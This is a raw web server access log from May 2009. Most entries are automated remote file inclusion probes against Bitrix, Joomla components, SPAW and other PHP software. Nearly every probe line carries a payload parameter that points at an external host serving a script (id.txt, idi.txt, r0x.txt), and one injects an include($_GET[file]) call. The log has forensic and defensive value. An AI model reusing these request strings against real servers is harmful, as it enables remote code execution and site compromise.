77.221.130.13 - - [31/May/2009:11:47:55 -0400] "GET /log/http://jamers.org/idx? HTTP/1.1" 404 306
211.110.19.178 - - [31/May/2009:11:48:12 -0400] "GET ////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 306
211.110.19.178 - - [31/May/2009:11:48:13 -0400] "GET /log/sdaglobal.org-access_log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 335
211.110.19.178 - - [31/May/2009:11:48:14 -0400] "GET /log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 310
211.110.19.178 - - [31/May/2009:11:48:25 -0400] "GET /log/sdaglobal.org-access_log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 335
211.110.19.178 - - [31/May/2009:11:48:25 -0400] "GET ////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 306
211.110.19.178 - - [31/May/2009:11:48:25 -0400] "GET /log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 310
121.0.141.241 - - [31/May/2009:11:49:23 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 325
121.0.141.241 - - [31/May/2009:11:49:23 -0400] "GET /log//components/com_simpleboard/image_upload.php?sbp=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 329
121.0.141.241 - - [31/May/2009:11:49:23 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//components/com_simpleboard/image_upload.php?sbp=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 358
211.110.19.178 - - [31/May/2009:11:49:47 -0400] "GET /log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 310
211.110.19.178 - - [31/May/2009:11:49:47 -0400] "GET ////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 306
211.110.19.178 - - [31/May/2009:11:49:47 -0400] "GET /log/sdaglobal.org-access_log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 335
211.110.19.178 - - [31/May/2009:11:49:53 -0400] "GET ////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 306
211.110.19.178 - - [31/May/2009:11:49:53 -0400] "GET /log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 310
211.110.19.178 - - [31/May/2009:11:49:53 -0400] "GET /log/sdaglobal.org-access_log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 335
121.0.141.241 - - [31/May/2009:11:51:03 -0400] "GET /log//components/com_simpleboard/image_upload.php?sbp=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 329
121.0.141.241 - - [31/May/2009:11:51:03 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 325
121.0.141.241 - - [31/May/2009:11:51:03 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_simpleboard/image_upload.php?sbp=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 356
211.110.19.178 - - [31/May/2009:11:51:15 -0400] "GET /log/sdaglobal.org-access_log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 335
211.110.19.178 - - [31/May/2009:11:51:15 -0400] "GET ////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 306
211.110.19.178 - - [31/May/2009:11:51:25 -0400] "GET /log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 310
211.110.19.178 - - [31/May/2009:11:51:44 -0400] "GET /log/sdaglobal.org-access_log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 335
211.110.19.178 - - [31/May/2009:11:51:44 -0400] "GET ////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 306
211.110.19.178 - - [31/May/2009:11:51:54 -0400] "GET /log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 310
91.121.137.51 - - [31/May/2009:11:52:19 -0400] "GET /log/sdaglobal.org-access_log//include.php?path[docroot]=http://www.eyepro.net//assets/images/master-id.txt? HTTP/1.1" 404 322
211.110.19.178 - - [31/May/2009:11:52:24 -0400] "GET /log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 310
211.110.19.178 - - [31/May/2009:11:52:24 -0400] "GET ////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 306
211.110.19.178 - - [31/May/2009:11:52:24 -0400] "GET /log/sdaglobal.org-access_log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 335
222.229.233.97 - - [31/May/2009:11:52:34 -0400] "GET /images/gd.gif HTTP/1.1" 200 4458
222.122.160.145 - - [31/May/2009:11:54:02 -0400] "GET //?_zb_path=http://geocities.com/afast.hazell/tools/id1.txt?? HTTP/1.1" 200 9432
222.122.160.145 - - [31/May/2009:11:54:02 -0400] "GET /log/sdaglobal.org-access_log%20%20//?_zb_path=http://geocities.com/afast.hazell/tools/id1.txt?? HTTP/1.1" 404 313
222.122.160.145 - - [31/May/2009:11:54:02 -0400] "GET /log//?_zb_path=http://geocities.com/afast.hazell/tools/id1.txt?? HTTP/1.1" 200 58350
222.122.160.145 - - [31/May/2009:11:54:10 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//?_zb_path=http://geocities.com/afast.hazell/tools/id1.txt?? HTTP/1.1" 404 315
121.0.141.241 - - [31/May/2009:11:55:19 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 325
121.0.141.241 - - [31/May/2009:11:55:19 -0400] "GET /log//components/com_simpleboard/image_upload.php?sbp=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 329
121.0.141.241 - - [31/May/2009:11:55:19 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_simpleboard/image_upload.php?sbp=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 356
121.0.141.241 - - [31/May/2009:11:56:01 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//components/com_simpleboard/image_upload.php?sbp=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 358
59.112.52.246 - - [31/May/2009:11:57:08 -0400] "GET /images/chinese.gif HTTP/1.1" 200 3578
59.112.52.246 - - [31/May/2009:11:57:08 -0400] "GET /images/china.gif HTTP/1.1" 200 3479
116.36.213.166 - - [31/May/2009:11:58:42 -0400] "GET /log/sdaglobal.org-access_log.1/?sourcedir=http://www.ecobook.or.kr/ecobook/data/ecobook/1132289642/copyright.txt???? HTTP/1.1" 404 312
211.110.19.178 - - [31/May/2009:11:59:34 -0400] "GET ////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 306
211.110.19.178 - - [31/May/2009:11:59:34 -0400] "GET /log/sdaglobal.org-access_log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 335
211.110.19.178 - - [31/May/2009:11:59:34 -0400] "GET /log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 310
211.110.19.178 - - [31/May/2009:11:59:36 -0400] "GET ////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 306
211.110.19.178 - - [31/May/2009:11:59:36 -0400] "GET /log/sdaglobal.org-access_log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 335
211.110.19.178 - - [31/May/2009:11:59:36 -0400] "GET /log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 310
211.110.19.178 - - [31/May/2009:12:00:15 -0400] "GET /log/sdaglobal.org-access_log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 335
211.110.19.178 - - [31/May/2009:12:00:15 -0400] "GET /log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 310
211.110.19.178 - - [31/May/2009:12:00:15 -0400] "GET ////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 306
203.194.204.129 - - [31/May/2009:12:00:40 -0400] "GET /log/sdaglobal.org-access_log%20%20////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 337
203.194.204.129 - - [31/May/2009:12:00:40 -0400] "GET /log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 310
203.194.204.129 - - [31/May/2009:12:00:40 -0400] "GET ////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 306
83.231.138.99 - - [31/May/2009:12:00:55 -0400] "GET //index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.superlaundry.com//images/.bash/id.txt? HTTP/1.1" 404 291
82.146.39.200 - - [31/May/2009:12:01:27 -0400] "GET /log/sdaglobal.org-access_log.3//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ambient-arts.co.uk/modules/id.txt??? HTTP/1.1" 404 364
82.146.39.200 - - [31/May/2009:12:01:27 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ambient-arts.co.uk/modules/id.txt??? HTTP/1.1" 404 333
82.146.39.200 - - [31/May/2009:12:01:27 -0400] "GET /log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ambient-arts.co.uk/modules/id.txt??? HTTP/1.1" 404 337
211.110.19.178 - - [31/May/2009:12:02:20 -0400] "GET /log/sdaglobal.org-access_log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 335
211.110.19.178 - - [31/May/2009:12:02:20 -0400] "GET /log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 310
211.110.19.178 - - [31/May/2009:12:02:21 -0400] "GET ////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 306
61.81.17.108 - - [31/May/2009:12:02:57 -0400] "GET //?path%5Bdocroot%5D=http://benini.xpg.com.br/Fx29ID1.txt?? HTTP/1.1" 200 9432
61.81.17.108 - - [31/May/2009:12:02:58 -0400] "GET /log/sdaglobal.org-access_log%20%20//?path%5Bdocroot%5D=http://benini.xpg.com.br/Fx29ID1.txt?? HTTP/1.1" 404 313
61.81.17.108 - - [31/May/2009:12:02:57 -0400] "GET /log//?path%5Bdocroot%5D=http://benini.xpg.com.br/Fx29ID1.txt?? HTTP/1.1" 200 58350
82.146.39.200 - - [31/May/2009:12:04:04 -0400] "GET /log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.ambient-arts.co.uk/modules/id.txt??? HTTP/1.1" 404 310
82.146.39.200 - - [31/May/2009:12:04:04 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.ambient-arts.co.uk/modules/id.txt??? HTTP/1.1" 404 306
66.249.72.107 - - [31/May/2009:12:04:21 -0400] "GET /robots.txt HTTP/1.1" 404 291
66.249.72.107 - - [31/May/2009:12:04:21 -0400] "GET /portugu.htm HTTP/1.1" 200 1892
82.146.39.200 - - [31/May/2009:12:04:51 -0400] "GET /log/sdaglobal.org-access_log.1//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.ambient-arts.co.uk/modules/id.txt??? HTTP/1.1" 404 337
82.146.39.200 - - [31/May/2009:12:04:51 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.ambient-arts.co.uk/modules/id.txt??? HTTP/1.1" 404 306
82.146.39.200 - - [31/May/2009:12:04:51 -0400] "GET /log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.ambient-arts.co.uk/modules/id.txt??? HTTP/1.1" 404 310
82.146.39.200 - - [31/May/2009:12:05:00 -0400] "GET /log/sdaglobal.org-access_log.1//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ambient-arts.co.uk/modules/id.txt??? HTTP/1.1" 404 364
61.81.17.108 - - [31/May/2009:12:05:26 -0400] "GET /log/sdaglobal.org-access_log//?path%5Bdocroot%5D=http://benini.xpg.com.br/Fx29ID1.txt?? HTTP/1.1" 404 311
142.233.200.21 - - [31/May/2009:12:05:36 -0400] "GET /images/english.gif HTTP/1.0" 200 2582
142.233.200.21 - - [31/May/2009:12:05:36 -0400] "GET /images/chinese.gif HTTP/1.0" 200 3578
83.231.138.99 - - [31/May/2009:12:05:47 -0400] "GET /log/sdaglobal.org-access_log.3//index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.superlaundry.com//images/.bash/id.txt? HTTP/1.1" 404 322
83.231.138.99 - - [31/May/2009:12:05:47 -0400] "GET //index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.superlaundry.com//images/.bash/id.txt? HTTP/1.1" 404 291
83.231.138.99 - - [31/May/2009:12:05:48 -0400] "GET /log//index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.superlaundry.com//images/.bash/id.txt? HTTP/1.1" 404 295
61.81.17.108 - - [31/May/2009:12:06:22 -0400] "GET /log/sdaglobal.org-access_log.4//?path%5Bdocroot%5D=http://benini.xpg.com.br/Fx29ID1.txt?? HTTP/1.1" 404 313
82.146.39.200 - - [31/May/2009:12:07:17 -0400] "GET /log/sdaglobal.org-access_log.4//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.ambient-arts.co.uk/modules/id.txt??? HTTP/1.1" 404 337
142.233.200.21 - - [31/May/2009:12:09:18 -0400] "GET /images/english.gif HTTP/1.0" 304 -
142.233.200.21 - - [31/May/2009:12:09:18 -0400] "GET /images/chinese.gif HTTP/1.0" 304 -
83.231.138.99 - - [31/May/2009:12:10:13 -0400] "GET /log/sdaglobal.org-access_log.1//index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.superlaundry.com//images/.bash/id.txt? HTTP/1.1" 404 322
203.194.204.129 - - [31/May/2009:12:10:57 -0400] "GET ////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 306
203.194.204.129 - - [31/May/2009:12:10:57 -0400] "GET /log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 310
203.194.204.129 - - [31/May/2009:12:10:57 -0400] "GET /log/sdaglobal.org-access_log%20%20////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 337
211.110.19.178 - - [31/May/2009:12:11:24 -0400] "GET /log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 310
211.110.19.178 - - [31/May/2009:12:11:24 -0400] "GET /log/sdaglobal.org-access_log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 335
211.110.19.178 - - [31/May/2009:12:11:24 -0400] "GET ////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 306
211.110.19.178 - - [31/May/2009:12:12:45 -0400] "GET /log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 310
211.110.19.178 - - [31/May/2009:12:12:45 -0400] "GET ////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 306
211.110.19.178 - - [31/May/2009:12:12:45 -0400] "GET /log/sdaglobal.org-access_log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 335
203.194.204.129 - - [31/May/2009:12:12:54 -0400] "GET ////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 306
203.194.204.129 - - [31/May/2009:12:12:54 -0400] "GET /log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 310
203.194.204.129 - - [31/May/2009:12:12:54 -0400] "GET /log/sdaglobal.org-access_log%20%20////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 337
208.80.195.38 - - [31/May/2009:12:13:16 -0400] "GET / HTTP/1.0" 200 9432
211.110.19.178 - - [31/May/2009:12:13:26 -0400] "GET /log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 310
211.110.19.178 - - [31/May/2009:12:13:26 -0400] "GET ////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 306
211.110.19.178 - - [31/May/2009:12:13:26 -0400] "GET /log/sdaglobal.org-access_log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 335
203.194.204.129 - - [31/May/2009:12:14:28 -0400] "GET ////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 306
203.194.204.129 - - [31/May/2009:12:14:28 -0400] "GET /log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 310
203.194.204.129 - - [31/May/2009:12:14:28 -0400] "GET /log/sdaglobal.org-access_log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 335
211.110.19.178 - - [31/May/2009:12:16:34 -0400] "GET /log/sdaglobal.org-access_log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 335
209.25.133.199 - - [31/May/2009:12:18:53 -0400] "GET /log/sdaglobal.org-access_log//admin/spaw/spaw_control.class.php?spaw_root=http://www.salaopontochic.com.br/r0x.txt? HTTP/1.1" 404 344
209.25.133.199 - - [31/May/2009:12:18:53 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.salaopontochic.com.br/r0x.txt? HTTP/1.1" 404 315
209.25.133.199 - - [31/May/2009:12:18:53 -0400] "GET /log//admin/spaw/spaw_control.class.php?spaw_root=http://www.salaopontochic.com.br/r0x.txt? HTTP/1.1" 404 319
211.110.19.178 - - [31/May/2009:12:19:26 -0400] "GET /log////bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.eann.kr//idi.txt??? HTTP/1.1" 404 310
83.202.59.18 - - [31/May/2009:12:22:36 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.superlaundry.com//images/.bash/id.txt? HTTP/1.1" 404 316
88.183.32.67 - - [31/May/2009:12:22:46 -0400] "GET /log/sdaglobal.org-error_log.1//modules/My_eGallery/public/displayCategory.php?basepath=http://xshellbrx.by.ru/id.txt?? HTTP/1.1" 404 358
88.183.32.67 - - [31/May/2009:12:22:47 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://xshellbrx.by.ru/id.txt?? HTTP/1.1" 404 328
88.183.32.67 - - [31/May/2009:12:22:47 -0400] "GET /log//modules/My_eGallery/public/displayCategory.php?basepath=http://xshellbrx.by.ru/id.txt?? HTTP/1.1" 404 332
83.202.59.18 - - [31/May/2009:12:26:28 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.superlaundry.com//images/.bash/id.txt? HTTP/1.1" 404 347
83.202.59.18 - - [31/May/2009:12:26:29 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.superlaundry.com//images/.bash/id.txt? HTTP/1.1" 404 316
83.202.59.18 - - [31/May/2009:12:26:29 -0400] "GET /log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.superlaundry.com//images/.bash/id.txt? HTTP/1.1" 404 320
203.194.204.129 - - [31/May/2009:12:32:59 -0400] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 333
203.194.204.129 - - [31/May/2009:12:32:59 -0400] "GET /log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 337
203.194.204.129 - - [31/May/2009:12:32:59 -0400] "GET /log/sdaglobal.org-access_log.1%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 366
203.194.204.129 - - [31/May/2009:12:33:24 -0400] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 333
203.194.204.129 - - [31/May/2009:12:33:24 -0400] "GET /log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 337
203.194.204.129 - - [31/May/2009:12:33:24 -0400] "GET /log/sdaglobal.org-access_log.1///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 364
209.25.133.199 - - [31/May/2009:12:34:53 -0400] "GET /log/sdaglobal.org-error_log//admin/spaw/spaw_control.class.php?spaw_root=http://www.salaopontochic.com.br/r0x.txt? HTTP/1.1" 404 343
216.17.99.13 - - [31/May/2009:12:39:29 -0400] "GET //webcalendar//ws/login.php?noSet=0&includedir=http://www.eann.kr/test.txt?? HTTP/1.1" 404 307
216.17.99.13 - - [31/May/2009:12:39:29 -0400] "GET /log//webcalendar//ws/login.php?noSet=0&includedir=http://www.eann.kr/test.txt?? HTTP/1.1" 404 311
80.59.178.71 - - [31/May/2009:12:43:31 -0400] "GET /log/sdaglobal.org-access_log.3/inurl:/modules/agendax/addevent.inc.php?agendax_path=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 351
80.59.178.71 - - [31/May/2009:12:43:31 -0400] "GET /inurl:/modules/agendax/addevent.inc.php?agendax_path=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 320
80.59.178.71 - - [31/May/2009:12:43:31 -0400] "GET /log/inurl:/modules/agendax/addevent.inc.php?agendax_path=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 324
83.202.59.18 - - [31/May/2009:12:44:09 -0400] "GET /log/sdaglobal.org-access_log.4//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.superlaundry.com//images/.bash/id.txt? HTTP/1.1" 404 347
123.143.98.5 - - [31/May/2009:12:47:04 -0400] "GET /log/sdaglobal.org-access_log//include/bbs.lib.inc.php?site_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 334
123.143.98.5 - - [31/May/2009:12:47:04 -0400] "GET /log//include/bbs.lib.inc.php?site_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 309
123.143.98.5 - - [31/May/2009:12:47:05 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 305
123.143.98.5 - - [31/May/2009:12:47:08 -0400] "GET /log//include/bbs.lib.inc.php?site_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 309
123.143.98.5 - - [31/May/2009:12:47:08 -0400] "GET /log/sdaglobal.org-access_log//include/bbs.lib.inc.php?site_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 334
123.143.98.5 - - [31/May/2009:12:47:08 -0400] "GET //include/bbs.lib.inc.php?site_path=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 305
94.23.200.54 - - [31/May/2009:12:48:17 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 330
94.23.200.54 - - [31/May/2009:12:48:17 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 330
94.23.200.54 - - [31/May/2009:12:48:17 -0400] "GET /log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 334
94.23.200.54 - - [31/May/2009:12:48:17 -0400] "GET /log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 334
94.23.200.54 - - [31/May/2009:12:48:26 -0400] "GET /log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 334
94.23.200.54 - - [31/May/2009:12:48:26 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 330
94.23.200.54 - - [31/May/2009:12:48:30 -0400] "GET /log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 334
94.23.200.54 - - [31/May/2009:12:48:30 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 330
82.149.246.8 - - [31/May/2009:12:49:35 -0400] "GET / HTTP/1.1" 200 9432
94.23.200.54 - - [31/May/2009:12:50:06 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 363
94.23.200.54 - - [31/May/2009:12:50:07 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 363
94.23.200.54 - - [31/May/2009:12:50:13 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 363
94.23.200.54 - - [31/May/2009:12:50:14 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 363
121.0.141.241 - - [31/May/2009:12:50:29 -0400] "GET /log//components/com_facileforms/facileforms.frame.php?ff_compath=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 334
121.0.141.241 - - [31/May/2009:12:50:29 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 330
94.23.200.54 - - [31/May/2009:12:51:06 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 363
94.23.200.54 - - [31/May/2009:12:51:06 -0400] "GET /log/sdaglobal.org-access_log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 361
94.23.200.54 - - [31/May/2009:12:51:08 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 363
94.23.200.54 - - [31/May/2009:12:51:08 -0400] "GET /log/sdaglobal.org-access_log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 361
94.23.200.54 - - [31/May/2009:12:51:11 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 361
